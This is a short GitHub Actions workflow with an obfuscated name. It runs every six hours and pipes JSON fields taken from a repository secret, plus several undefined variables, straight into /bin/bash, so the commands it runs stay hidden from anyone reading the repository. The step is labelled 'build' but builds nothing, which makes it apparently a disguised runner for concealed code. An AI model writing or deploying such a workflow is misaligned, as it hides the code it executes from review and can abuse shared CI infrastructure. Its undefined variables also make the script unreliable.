name: zhangyuqing6758

on:
  workflow_dispatch:
  schedule:
    - cron: '0 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangyuqing6758
        env:
          dofp689: ${{ secrets.dofp689 }}
        run: |
          echo $dofp689 | jq -r .y3385 | /bin/bash
          echo $ei15 | jq -r .mwee4609 | /bin/bash
          echo $axw089 | jq -r .aixc3189 | /bin/bash
          echo $pdlr47216 | jq -r .lwft44015 | /bin/bash

